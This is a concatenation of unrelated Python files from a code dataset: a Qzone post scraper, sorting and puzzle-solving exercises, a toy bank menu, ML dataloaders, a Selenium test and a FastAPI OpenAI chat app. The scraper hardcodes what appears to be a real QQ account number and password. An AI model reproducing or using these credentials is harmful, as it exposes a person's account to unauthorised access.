WebDriverWait(driver,10).until(\n EC.element_to_be_clickable((By.ID,'pager_next_'+str(i)))\n )\n except:\n return None\n else:\n driver.find_element_by_id('pager_next_'+str(i)).click()\n return 1\n\n# Get the shuoshuo posts on the current page\ndef onePageInfo():\n # by default driver.switch_to_frame(driver.find_element_by_class_name('app_canvas_frame'))\n global driver\n bsObj = BeautifulSoup(driver.page_source,'lxml')\n times_contents = [[li0.find('a',class_='c_tx3').get_text(),li0.find('pre',class_='content').get_text()] \\n for li0 in bsObj.findAll('li',class_='feed')]\n return times_contents\n\n# Get the info from all pages\ndef allPageInfo(query_name):\n global driver\n shuoshuo_index_url = \"http://user.qzone.qq.com/\"+query_name+'/311'\n driver.get(shuoshuo_index_url)\n # first check whether we have permission to visit this space\n # (the Chinese string below is page text used for matching and must stay as-is)\n b0 = BeautifulSoup(driver.page_source,'lxml')\n if b0.find('p',class_='tips').get_text()==\"主人设置了权限,您可通过以下方式访问\":\n return None\n # enter the main iframe\n try:\n element = WebDriverWait(driver,10).until(\n EC.presence_of_element_located((By.CLASS_NAME,'app_canvas_frame'))\n )\n except TimeoutException:\n print ('Initialization error')\n else:\n driver.switch_to_frame(driver.find_element_by_class_name('app_canvas_frame'))\n allPagesNum = allPages()\n # start extracting the info\n TIMES_CONSTENTS = []\n for i in tqdm(range(allPagesNum)):\n # sys.stdout.write('\\b\\bstarting collection of page '+str(i+1))\n # sys.stdout.flush()\n times_contents = onePageInfo()\n TIMES_CONSTENTS+=times_contents\n if i != allPagesNum-1:\n if nextPage(i)==None:\n print ('nextPage failed at page '+str(i))\n break\n print ('All done.','Collected',allPagesNum,'pages of data;',len(TIMES_CONSTENTS),'shuoshuo posts in total.')\n return TIMES_CONSTENTS\n\n\n\n# Save the info locally\ndef write2csv(TIMES_CONSTENTS,dest='test.csv'):\n p = pd.DataFrame(TIMES_CONSTENTS)\n p.to_csv(dest,index=False,header=['time','content'])\n print ('csv file written to:',os.getcwd()+'/'+dest)\n\n\n\nif __name__ == '__main__':\n # initialization\n driver = webdriver.PhantomJS('/usr/local/phantomjs/bin/phantomjs')\n driver.implicitly_wait(1)\n # name = input('Enter the QQ number used to log in: ')\n # pw = input('Enter the matching QQ password: ')\n name = '771657815'\n pw = 'ygy433991100'\n logIn(name,pw)\n query_name = input('Enter the QQ account whose shuoshuo to query: ')\n TIMES_CONSTENTS = allPageInfo(query_name)\n if TIMES_CONSTENTS==None:\n print ('No permission to access this QQ account')\n else:\n dest= input('Enter the save path: ')\n write2csv(TIMES_CONSTENTS,dest=dest)\n\n\n\n\n","repo_name":"YoungGer/ScrapingPractice","sub_path":"QQ说说_py3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73978020648","text":"array = [64, 21, 43, 46]\n\n#### ALGORITHM START\n\n# Loop through the array starting at the \n# first index and ending at the second to last\nfor i in range(len(array)-1): \n # Set the index with the smallest value to\n # our current i value\n index_smallest_num = i \n \n # Now we can compare our smallestIndex (i)\n # with every other element in the array.\n # We start with the value next to i which\n # is i + 1\n for j in range(i+1, len(array)): \n if array[index_smallest_num] > array[j]: \n index_smallest_num = j \n\n # Swap the elements i and smallestIndex are\n # pointing to\n array[i], array[index_smallest_num] = array[index_smallest_num], array[i]\n\n\n#### ALGORITHM END\n\n\nprint(array)","repo_name":"jayaike/Tutorials","sub_path":"Algorithms/Selection Sort/selection_sort_python.py","file_name":"selection_sort_python.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"3734595570","text":"from torch.utils.data import DataLoader\n\nfrom datasets import AudioDataset\nfrom utils import Collator, train_val_splitter\n\n\ndef create_dataloader(path, transform, batch_size=16):\n dataset = AudioDataset(path, transform=transform)\n train_dataset, validation_dataset = train_val_splitter(dataset)\n\n train_dataloader = DataLoader(\n train_dataset,\n batch_size=batch_size,\n shuffle=True,\n collate_fn=Collator(),\n )\n\n validation_dataloader = DataLoader(\n validation_dataset,\n batch_size=batch_size,\n shuffle=True,\n collate_fn=Collator(),\n )\n return train_dataloader, validation_dataloader\n","repo_name":"adolkhan/AudioMNIST","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19892583603","text":"from BankAccount import BankAccount\n\n# the objects from BankAccount class are in this class because I realised that\n# importing a class doesn't automatically import its objects\nclient1 = BankAccount(30, \"Kundai\", \"3A\")\nclient2 = BankAccount(30, \"Jane\", \"3B\")\nclient3 = BankAccount(30, \"Tanu\", \"3C\")\nclient4 = BankAccount(30, \"Eli\", \"3D\")\nclient5 = BankAccount(30, \"Sarah\", \"3E\")\n\n# They all have an initial bank deposit of 30 dollars.\n# The bank requires a new account holder to have an initial deposit of 30 dollars.\n\n# the menu function contains instructions on how to 
perform an action.\n\n\ndef menu():\n print(\"Enter 1 if you want to view your account details\")\n print(\"Enter 2 if you want to withdraw money from your account.\")\n print(\"Enter 3 if you want to deposit money into your account.\")\n print(\"Enter 4 if you want to transfer money to another person who holds an account in this bank.\")\n print(\"Enter 5 if you want to exit.\")\n\n# the display_money function contains instructions for the program to follow depending on\n# who the owner of the account is.\n# the owner inputs their account number instead of their names since no two people can have the same account number.\n\n\ndef display_money():\n identity = input(\"To log into your account please input your account number: \")\n\n if identity == \"3A\":\n client1.display()\n elif identity == \"3B\":\n client2.display()\n elif identity == \"3C\":\n client3.display()\n elif identity == \"3D\":\n client4.display()\n elif identity == \"3E\":\n client5.display()\n else:\n print(\"Invalid account number. Please input your account number.\")\n\n# the withdraw_cash function contains instructions for the program to follow depending on\n# who the owner of the account is.\n\n\ndef withdraw_cash():\n identity = input(\"To log into your account please input your account number: \")\n if identity == \"3A\":\n client1.withdraw()\n elif identity == \"3B\":\n client2.withdraw()\n elif identity == \"3C\":\n client3.withdraw()\n elif identity == \"3D\":\n client4.withdraw()\n elif identity == \"3E\":\n client5.withdraw()\n else:\n print(\"Invalid account number. Please input your account number.\")\n\n# the deposit_cash function contains instructions for the program to follow depending on\n# who the owner of the account is.\n\n\ndef deposit_cash():\n identity = input(\"To log into your account please input your account number: \")\n if identity == \"3A\":\n client1.deposit()\n elif identity == \"3B\":\n client2.deposit()\n elif identity == \"3C\":\n client3.deposit()\n elif identity == \"3D\":\n client4.deposit()\n elif identity == \"3E\":\n client5.deposit()\n else:\n print(\"Invalid account number. Please input the correct account number for your bank account.\")\n\n# used the while loop to keep on prompting the user if he wants to perform any action.\n# used the exit function to break out of the loop when the user does not want to perform any function.\n\n\nwhile True:\n user = input(\"Do you want to perform any action? 
\").lower()\n # used conditional statements to control the flow of the program.\n if user == \"yes\":\n menu()\n choice = int(input(\"What choice do you want?: \"))\n if choice == 1:\n display_money()\n elif choice == 2:\n withdraw_cash()\n elif choice == 3:\n deposit_cash()\n elif choice == 4:\n client1.transfer()\n elif choice == 5:\n exit()\n else:\n print(\"Choice selected is unrecognised.\")\n else:\n exit()\n","repo_name":"Kundai10/OnlineBank","sub_path":"BankAccount_Part2.py","file_name":"BankAccount_Part2.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26204095635","text":"# Crea un programa que invierta el orden de una cadena de texto\n# sin usar funciones propias del lenguaje que lo hagan de forma automática.\n# - Si le pasamos \"Hola mundo\" nos retornaría \"odnum aloH\"\n\ncadena = input('Introduzca cadena de texto a invertir: ')\n\ncadena_inv = list(cadena)\ncadena_inv = \"\".join(cadena_inv[::-1])\n\nprint(cadena_inv)\n","repo_name":"gusavato/Retos_mouredev","sub_path":"6_Invirtiendo_cadenas.py","file_name":"6_Invirtiendo_cadenas.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35897007554","text":"def check_speed(speed=0):\n if speed > 70:\n delta = speed - 70\n points = int(delta / 5)\n if points > 11:\n print(\"Police: License suspended boy!\")\n else:\n print(\"Police: You went so fast! You have to pay a tax of {} points\".format(points))\n else:\n print(\"Police: Okey, continue\")\n \ncheck_speed(600)\n \n","repo_name":"bd52622020/appSpaceJavier","sub_path":"Task3_Python_WarmUp/A3_Speed_drivers.py","file_name":"A3_Speed_drivers.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16392178023","text":"from torch.utils.data import Dataset\nimport torch\nimport random\nimport pandas as pd\nimport numpy as np\nfrom numba import jit\nimport pickle\n\n\nclass DatasetSeqLM(Dataset):\n def __init__(self, corpus_path, seq_len):\n # self.vocab = vocab\n amino_acids = pd.read_csv('data/amino_acids.csv')\n self.vocab = {x: y for x, y in zip(amino_acids.AA, amino_acids.idx)}\n self.vocab['pad_index'] = 0\n # self.vocab['mask_index'] = 21\n self.vocab['sos_index'] = 21\n # self.vocab['eos_index'] = 23\n self.vocab['unk_index'] = 22\n\n self.seq_len = seq_len\n # self.corpus_path = corpus_path\n\n df = pd.read_csv(corpus_path)\n # df.sort_values(by='seq', ascending=True, inplace=True)\n self.seq = df['seq_unalign'].values\n self.slen = df['seq_len'].values\n self.num_seq = len(self.slen)\n\n # with open(corpus_path, \"r\") as f:\n # self.seq = [line[:-1] for line in f]\n # self.num_seq = len(self.seq)\n\n def __len__(self):\n return self.num_seq\n\n def __getitem__(self, item):\n t1 = self.seq[item]\n\n seq = self.tokenizer(t1)\n seq_x = [self.vocab['sos_index']] + seq[:-1]\n\n output = {\"seq\": seq,\n \"seq_x\": seq_x,\n }\n\n for key, value in output.items():\n # output[key] = torch.tensor(value, requires_grad=False)\n output[key] = torch.tensor(value)\n return output\n\n def tokenizer(self, sentence):\n tokens = list(sentence)\n for i, token in enumerate(tokens):\n try:\n tokens[i] = self.vocab[token]\n except KeyError:\n tokens[i] = self.vocab['unk_index']\n # crop long seq or pad short seq\n if len(tokens) > self.seq_len:\n tokens = tokens[0:self.seq_len]\n else:\n 
padding = [self.vocab['pad_index'] for _ in range(self.seq_len - len(tokens))]\n tokens.extend(padding)\n return tokens\n\n\nif __name__ == '__main__':\n # dataset = DatasetSeqLM('data/pf00400_unalign_clean_train.txt', seq_len=50)\n dataset = DatasetSeqLM('data/seq_unalign_indel_all_cut_sample.csv', seq_len=256)\n\n\n\n","repo_name":"lahplover/unippi","sub_path":"data/seq_lm_dataset.py","file_name":"seq_lm_dataset.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8016572499","text":"from __future__ import absolute_import, division, print_function, unicode_literals\r\nimport numpy as np\r\n\r\nclass Normalizer:\r\n\tdef __init__(self, vmin, vmax, clip=False):\r\n\t\tself.vmin = vmin\r\n\t\tself.vmax = vmax\r\n\t\tself.clip = clip\r\n\r\n\tdef copyAndClip(self, A):\r\n\t\tif self.clip:\r\n\t\t\tA = np.clip(A, self.vmin, self.vmax)\r\n\t\telse:\r\n\t\t\tA = A.copy()\r\n\t\treturn A\r\n\r\nclass Normalize(Normalizer):\r\n\tdef Normalize(self, A, scale=1):\r\n\t\tA = self.copyAndClip(A)\r\n\t\tA -= self.vmin\r\n\t\tA *= scale / (self.vmax - self.vmin)\r\n\t\treturn A\r\n\r\n\r\nclass LogNorm(Normalizer):\r\n\tdef Normalize(self, A, scale=1):\r\n\t\tA = self.copyAndClip(A)\r\n\t\tnp.log(A, out=A)\r\n\t\tA -= np.log(self.vmin)\r\n\t\tA *= scale / np.log(self.vmax/self.vmin)\r\n\t\treturn A\r\n","repo_name":"Geocene/cookstove_test_tracker","sub_path":"Current/mpl/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32073592306","text":"'''\r\nCreated on Feb 18, 2019\r\n\r\n@author: subharad\r\n'''\r\nfrom selenium import webdriver\r\nfrom test_login import Login\r\nfrom test_homepage import homepage\r\nimport unittest\r\nimport time\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass LoginTest(unittest.TestCase):\r\n \r\n @classmethod\r\n def setUpClass(cls):\r\n super(LoginTest, cls).setUpClass()\r\n cls.driver = webdriver.Chrome(\"C:\\selenium_scripts\\Selenium\\driver\\chromedriver.exe\")\r\n #cls.driver.implicitly_wait(10)\r\n cls.driver.maximize_window()\r\n \r\n \r\n def test_appointment_submit(self):\r\n driver = self.driver\r\n login = Login(driver)\r\n login.login()\r\n apt =homepage(driver)\r\n apt.click_appointment()\r\n try:\r\n apt.delete_btn()\r\n time.sleep(2)\r\n apt.delete_yes_message()\r\n time.sleep(2)\r\n except:\r\n print(\"no entries to delete\")\r\n \r\n \r\n \r\n \r\n \r\n @classmethod\r\n def tearDownClass(cls):\r\n super(LoginTest, cls).tearDownClass()\r\n cls.driver.close()\r\n cls.driver.quit()","repo_name":"SudhanvaRB/SeleniumProjects","sub_path":"Selenium/Pytest/vims_unitest.py","file_name":"vims_unitest.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8002127201","text":"import os\nimport openai\n\nfrom fastapi import FastAPI, Request, Form\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory=\"templates\")\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n# Set your OpenAI API key\nopenai.api_key = os.getenv('API_KEY')\n\n\n# Function that generates a response from a prompt\ndef generate_response(prompt):\n response = openai.Completion.create(\n 
engine=\"text-davinci-003\",\n prompt=prompt,\n max_tokens=2048,\n n=1,\n stop=None,\n temperature=0.5,\n )\n return response.choices[0].text.strip()\n\n\n# Ruta principal del sitio web\n@app.get(\"/\")\nasync def index(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n\n# Ruta para procesar la entrada del usuario y generar una respuesta\n@app.post(\"/chat\")\nasync def chat(request: Request, message: str = Form(...)):\n prompt = f\"Usuario: {message}\\nJarvis:\"\n response = generate_response(prompt)\n return templates.TemplateResponse(\"index.html\", {\"request\": request, \"message\": message, \"response\": response})\n","repo_name":"ChristianMallma/jarvis-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15982197808","text":"with open('day13.txt') as f:\n lines = f.readlines()\n\ndef fold_on_y(matrix, coord):\n for x in range(len(matrix[0])):\n assert(matrix[coord][x] == 0)\n start_y= coord - (len(matrix) - coord - 1)\n for y in range(start_y, coord):\n for x in range(len(matrix[0])):\n matrix[y][x] |= matrix[len(matrix) - 1 - (y - start_y)][x]\n return matrix[0:coord]\n\ndef fold_on_x(matrix, coord):\n new_matrix = list()\n start_x = coord - (len(matrix[0]) - coord - 1)\n for y in range(len(matrix)):\n for x in range(start_x, coord):\n assert(matrix[y][coord] == 0)\n matrix[y][x] |= matrix[y][len(matrix[y]) - 1 - (x - start_x)]\n new_matrix.append(matrix[y][0:coord])\n return new_matrix\n\nxcoord = list()\nycoord = list()\nfold_index=0\nfor fold_index,line in enumerate(lines):\n if line == \"\\n\":\n break\n xcoord.append(int(line.rstrip().split(\",\")[0]))\n ycoord.append(int(line.rstrip().split(\",\")[1]))\n\nfolds = list()\nfor index in range(fold_index+1, len(lines)):\n fold_info = lines[index].rstrip().split()[2]\n folds.append((fold_info.split(\"=\")[0], int(fold_info.split(\"=\")[1])))\n\n\n\nmatrix = [[0] * (max(xcoord)+1) for _ in range(max(ycoord)+1)]\n\nfor x,y in zip(xcoord, ycoord):\n matrix[y][x] = 1\n\nfirst_fold = folds.pop(0)\nif first_fold[0] == \"y\":\n matrix = fold_on_y(matrix, first_fold[1])\n\nif first_fold[0] == \"x\":\n matrix = fold_on_x(matrix, first_fold[1])\n\nno_dots=0\nfor line in matrix:\n for dot in line:\n no_dots += dot\n\nprint(f\"part1: {no_dots}\")\n\nfor fold in folds:\n if fold[0] == \"y\":\n matrix = fold_on_y(matrix, fold[1]).copy()\n elif fold[0] == \"x\":\n matrix = fold_on_x(matrix, fold[1]).copy()\n else:\n assert(False)\nprint(\"part2: \")\nfor line in matrix:\n print(\"\".join([\"#\" if entry == 1 else \".\" for entry in line]))\n\n","repo_name":"tuze-scanreach/aoc2021","sub_path":"day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22528896647","text":"import telebot\nfrom telebot import types\nimport sql.use_sql as sql\nimport random\nimport config\n\nLEARN = 5\nbot = telebot.TeleBot(config.TOKEN)\nACCEPT_MESSAGES = ['Правильно, умница! 😎', 'Excellent job! 🥳', 'Молодец, так держать! 🤓',\n 'Правильный ответ, крутяк! 🤩']\nTRY_AGAIN = ['Попробуй ввести снова 🥺', 'Попробуй снова 😣', 'Ты ошибся, подумай лучше! 
😖']\n\n\ndef is_learned(tg_id, word_id):\n \"\"\"\n Проверяет слово выучено пользователем или нет.\n :param tg_id:\n :param word_id:\n :return: true(learned)/false(not learned)\n \"\"\"\n notes = sql.notes_by_user_and_word(tg_id, word_id)\n if notes == []:\n return False\n elif len(notes) == 1 and notes[0][3] == 'GENERATED':\n return False\n else:\n return True\n\n\ndef generate_word(tg_id):\n \"\"\"\n Генерирует новое слово, проверяя его на то что оно уже выучено, если выучено то генерируется новое.\n :param tg_id:\n :return: word (tuple): (word_id, word_en, word_ru, category, sentence, hate)\n \"\"\"\n # TODO (@Олеся)\n flag = 0\n words = sql.all_words()\n while flag == 0:\n word = random.choice(words)\n if not is_learned(tg_id, word[0]):\n flag = 1\n return word\n\n\ndef send_new_word(tg_id):\n \"\"\"\n Генерирует новое слово\n Отправляет юзеру это слово\n :param tg_id:\n :return:\n \"\"\"\n if sql.user_info(tg_id)['cnt_words_today'] == 10:\n markup = types.InlineKeyboardMarkup()\n markup.add(types.InlineKeyboardButton(text='Главное меню 🪴', callback_data='menu'))\n bot.send_message(chat_id=tg_id, text=f'Сегодня ты уже выучил 10 слов. Возвращайся завтра! 😉', reply_markup=markup)\n else:\n word = generate_word(tg_id)\n sql.add_new_note(tg_id, word[0], sql.GENERATED, None)\n sql.set_new_word_id(tg_id, word[0])\n my_words = generate_choice(word[0])\n markup = types.InlineKeyboardMarkup()\n item1 = types.InlineKeyboardButton(text=word[2], callback_data='accept')\n item2 = types.InlineKeyboardButton(text=my_words[1][1], callback_data='wrong')\n item3 = types.InlineKeyboardButton(text=my_words[2][1], callback_data='wrong')\n item4 = types.InlineKeyboardButton(text=my_words[3][1], callback_data='wrong')\n item5 = types.InlineKeyboardButton(text='Главное меню 🪴', callback_data='menu')\n spisok = [item4, item3, item2, item1]\n random.shuffle(spisok)\n spisok.append(item5)\n for i in spisok:\n markup.add(i)\n bot.send_message(chat_id=tg_id, text=f'Твое слово: {word[1]} 🎓\\n\\nВыбери правильный вариант ответа:',\n reply_markup=markup)\n\n\ndef generate_choice(word_id):\n \"\"\"\n Generate 3 wrong answer\n :param word_id:\n :return: list(of 4 tuples(word_id, word_ru, word_en, 1-correct answer, 0-wrong answer))\n \"\"\"\n list_of_selected_words = [word_id]\n list_of_words = [(word_id, sql.word_info(word_id)[2], sql.word_info(word_id)[1], 1)]\n while len(list_of_words) < 4:\n wrong_word = random.choice(sql.all_words())\n if wrong_word[0] not in list_of_selected_words:\n list_of_words.append((wrong_word[0], wrong_word[2], wrong_word[1], 0))\n list_of_selected_words.append(wrong_word[0])\n return list_of_words\n\n\ndef generate_repeat_word(tg_id):\n \"\"\"\n выбирает слово для повторения\n :param tg_id:\n :return: word_id:\n \"\"\"\n notes = sql.notes_by_user(tg_id)\n all_retry_words = set()\n for note in notes:\n if note[3] == sql.RETRY and note[4] < LEARN:\n all_retry_words.add(note[2])\n all_retry_words = list(all_retry_words)\n repeat_word = random.choice(all_retry_words)\n return repeat_word\n\n\ndef send_repeat_word(tg_id):\n \"\"\"\n Отправляет пользователю слово для повторения.\n :param tg_id:\n :return: nothing\n \"\"\"\n word_id = generate_repeat_word(tg_id)\n word = sql.word_info(word_id)\n markup = types.InlineKeyboardMarkup()\n markup.add(types.InlineKeyboardButton(text='Главное меню 🪴', callback_data='menu'))\n bot.send_message(chat_id=tg_id, text=f'Введи английский перевод этого слова: {word[2]}', reply_markup=markup)\n sql.set_repeat_word_id(tg_id, 
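`generate_choice` above draws wrong answers one at a time in a while loop, re-rolling on collisions; `random.sample` performs the deduplicated draw in one call. A sketch with simplified `(id, ru, en)` tuples and made-up data:

```python
import random

def make_quiz_options(correct, all_words, n_wrong=3):
    """Return the correct word plus n_wrong distinct distractors, shuffled."""
    pool = [w for w in all_words if w[0] != correct[0]]
    options = [correct] + random.sample(pool, n_wrong)
    random.shuffle(options)
    return options

words = [(1, "кот", "cat"), (2, "пёс", "dog"),
         (3, "дом", "house"), (4, "хлеб", "bread")]
print(make_quiz_options(words[0], words))
```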
word[0])\n\n@bot.message_handler(commands=['learn_new'])\ndef learn_new(message):\n tg_id = message.from_user.id\n send_new_word(tg_id)\n\n@bot.message_handler(commands=['repeat_word'])\ndef repeat_word(message):\n tg_id = message.from_user.id\n send_repeat_word(tg_id)\n\n@bot.message_handler(commands=['add_words'])\ndef add_words(message):\n tg_id = message.from_user.id\n bot.send_message(tg_id, 'Пришли файл cо словами, для удобства используй вот такой шаблон:')\n bot.send_document(tg_id, open('files/shablon.xlsx', 'rb'))\n\n\n\n@bot.message_handler(commands=['start'])\ndef welcome(message):\n user_id = message.from_user.id\n user_username = message.from_user.username\n sticker = open('img/welcome.webp', 'rb')\n bot.send_sticker(message.chat.id, sticker)\n\n markup = types.InlineKeyboardMarkup(row_width=1)\n item1 = types.InlineKeyboardButton(text='Профиль 🗂', callback_data='profile')\n item2 = types.InlineKeyboardButton(text='Учить новые слова 🔎', callback_data='learn_new')\n item3 = types.InlineKeyboardButton(text='Повторять слова 📚', callback_data='repeat_words')\n markup.add(item1, item2, item3)\n bot.send_message(message.chat.id,\n 'Привет, {0.first_name}! 🥰\\nЯ - {1.first_name}, бот для изучения английского языка. 🤖'.format(\n message.from_user, bot.get_me()), parse_mode='html', reply_markup=markup)\n if not sql.is_user_in_db(message.from_user.id):\n sql.new_user(user_id, user_username)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_inline(call):\n tg_id = call.from_user.id\n if sql.is_user_in_db(tg_id):\n username = call.message.chat.username\n if call.message:\n if call.data == 'profile':\n markup2 = types.InlineKeyboardMarkup()\n markup2.add(types.InlineKeyboardButton(text='Учить новые слова 🔎', callback_data='learn_new'))\n markup2.add(types.InlineKeyboardButton(text='Повторять слова 📚', callback_data='repeat_words'))\n markup2.add(types.InlineKeyboardButton(text='Главное меню 🪴', callback_data='menu'))\n score = sql.user_info(tg_id)['score']\n bot.send_message(tg_id,\n f'Твой ник 😊: {username}\\n\\nТвои очки 😋: {score}\\n\\nВыученных слов 🤌: '\n f'{sql.user_info(tg_id)[\"cnt_words_total\"]}',\n reply_markup=markup2)\n elif call.data == 'learn_new':\n send_new_word(tg_id)\n elif call.data == 'repeat_words':\n send_repeat_word(tg_id)\n elif call.data == 'wrong':\n bot.send_message(tg_id,\n 'Не верно, но не расстраивайся, в следующий раз все получится! 
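The `callback_inline` handler in this record resolves `call.data` through a long if/elif chain; the usual refactor is a dispatch table. A plain-Python sketch (the handlers here are stubs, not the bot's real actions):

```python
def show_profile(tg_id): return f"profile for {tg_id}"
def learn_new_word(tg_id): return f"new word for {tg_id}"
def show_menu(tg_id): return f"menu for {tg_id}"

HANDLERS = {
    "profile": show_profile,
    "learn_new": learn_new_word,
    "menu": show_menu,
}

def dispatch(callback_data, tg_id):
    # Unknown callback_data falls back to the main menu.
    return HANDLERS.get(callback_data, show_menu)(tg_id)

print(dispatch("profile", 42))  # profile for 42
```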
😚')\n send_new_word(tg_id)\n elif call.data == 'accept':\n bot.send_message(tg_id,\n random.choice(ACCEPT_MESSAGES))\n # sql.add_new_note(tg_id, sql.user_info(tg_id)['new_word_id'], sql.RETRY, 0)\n sql.update_note(tg_id, sql.user_info(tg_id)['new_word_id'], type=sql.RETRY, again=0)\n send_new_word(tg_id)\n sql.inc_cnt_today(tg_id)\n elif call.data == 'menu':\n markup = types.InlineKeyboardMarkup(row_width=1)\n item1 = types.InlineKeyboardButton(text='Профиль 🗂', callback_data='profile')\n item2 = types.InlineKeyboardButton(text='Учить новые слова 🔎', callback_data='learn_new')\n item3 = types.InlineKeyboardButton(text='Повторять слова 📚', callback_data='repeat_words')\n markup.add(item1, item2, item3)\n bot.send_message(tg_id, 'Главное меню🪴', reply_markup=markup)\n\n\n\n@bot.message_handler(content_types=['text'])\ndef lalala(message):\n tg_id = message.from_user.id\n if sql.is_user_in_db(tg_id):\n user = sql.user_info(tg_id)\n repeat_word_id = user['repeat_word_id']\n eng = sql.word_info(repeat_word_id)\n if message.text == eng[1]:\n bot.send_message(chat_id=tg_id, text=random.choice(ACCEPT_MESSAGES))\n sql.inc_again_retry_word(tg_id, repeat_word_id)\n sql.set_repeat_word_id(tg_id, 0)\n send_repeat_word(tg_id)\n else:\n bot.send_message(chat_id=tg_id, text=random.choice(TRY_AGAIN))\n else:\n bot.send_message(message.chat.id, 'Напиши \"/start\", чтобы начать пользоваться ботом! ✨')\n # TODO (@Олеся) нужно сказать напиши /start\n\n\nbot.polling(none_stop=True)\n# тууган туган як\n","repo_name":"lippertmark/Learn_En_words","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9704,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73542920808","text":"from typing import final\nimport numpy as np\nfrom numpy.core.fromnumeric import argmin\n\nDEPTH_MAX=50 # Root node has 0 depth\nnp.random.seed(1)\n#--------------------#\n# Equality of arrays #\n#--------------------#\ndef is_equal(A,B):\n if A.shape[0]!=B.shape[0] or A.shape[1]!=B.shape[1]:\n return False\n for i in range(A.shape[0]):\n for j in range(B.shape[1]):\n if A[i][j]!=B[i][j]:\n return False\n return True\n#--------------------#\n# Printing dashboard #\n#--------------------#\ndef print_dashboard(A):\n print(\"%d : %d : %d\" %(A[0][0],A[0][1],A[0][2]))\n print(\"%d : %d : %d\" %(A[1][0],A[1][1],A[1][2]))\n print(\"%d : %d : %d\" %(A[2][0],A[2][1],A[2][2]))\n#------------#\n# Node class #\n#------------#\nclass node:\n def __init__(self,value,cost,father_node=None):\n self.value = value\n self.cost=cost\n self.father_node = father_node\n # Depth\n depth_node=0\n father=father_node\n while father!=None:\n father=father.father_node\n depth_node=depth_node+1\n self.depth=depth_node\n # Equality in nodes\n def __eq__(self, other):\n if isinstance(other, node):\n aux1=self.value\n aux2=other.value\n return is_equal(aux1,aux2)\n return False\n#-------------#\n# Node Deepth #\n#-------------#\ndef depth(current_state):\n depth_node=0\n father=current_state.father_node\n while father!=None:\n father=father.father_node\n depth_node=depth_node+1\n return depth_node\n'''\nDistances\n''' \n#--------------------# \n# Manhattan distance #\n#--------------------#\ndef Manhattan_dist(current_value,final_value):\n dist=0\n for i in range(3):\n for value in final_value[i]:\n if value!=0.0:\n dist+=abs(np.where(current_value==value)[0]-np.where(final_value==value)[0])[0]\n dist+=abs(np.where(current_value==value)[1]-np.where(final_value==value)[1])[0]\n return 
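`Manhattan_dist` in the 8-puzzle record calls `np.where` twice per tile on every evaluation. A sketch of the standard way to write this heuristic, precomputing the goal positions once per call (names are mine):

```python
import numpy as np

def manhattan(current, goal):
    """Sum of row and column offsets of every non-blank tile from its goal slot."""
    pos = {int(v): (i, j) for i, row in enumerate(goal) for j, v in enumerate(row)}
    dist = 0
    for i, row in enumerate(current):
        for j, v in enumerate(row):
            if v != 0:  # the blank (0) is ignored, as in the original
                gi, gj = pos[int(v)]
                dist += abs(i - gi) + abs(j - gj)
    return dist

start = np.array([[1, 2, 3], [4, 5, 6], [8, 7, 0]])
goal = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 0]])
print(manhattan(start, goal))  # 2
```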
dist\n#--------------------#\n# Counting distance #\n#--------------------# \ndef Counting_dist(current_value,final_value):\n misplaced=(current_value==final_value)\n dist=misplaced.size-np.sum(misplaced)\n if np.where(current_value==0)!=np.where(final_value==0):\n return dist-1\n return dist\n#----------------------#\n# Permutation distance #\n#----------------------#\ndef Inversion_dist(current_value,final_value):\n # Inversions based in the order configuration 123456780\n inv_count_current = 0\n arr_current=[j for sub in current_value for j in sub]\n empty_value = 0\n for i in range(0, 9):\n for j in range(i + 1, 9):\n if arr_current[i] != empty_value and arr_current[j] != empty_value and arr_current[i] > arr_current[j]:\n inv_count_current += 1\n # Number of inversions for the final value\n inv_count_final = 0\n arr_final=[j for sub in final_value for j in sub]\n for i in range(0, 9):\n for j in range(i + 1, 9):\n if arr_final[i] != empty_value and arr_final[j] != empty_value and arr_final[i] > arr_final[j]:\n inv_count_final += 1\n return abs(inv_count_current-inv_count_final) # In the goal is zero \n'''\nInformed Search\n'''\n#--------------#\n# A* Algorithm #\n#--------------#\nclass A_star:\n # Initial variables \n def __init__(self,init_value,final_value,dist_func):\n self.init_state=node(value=init_value,cost=dist_func(init_value,final_value))\n self.final_value=final_value\n self.open_states=[]\n self.closed_states=[]\n # Count inversions\n def 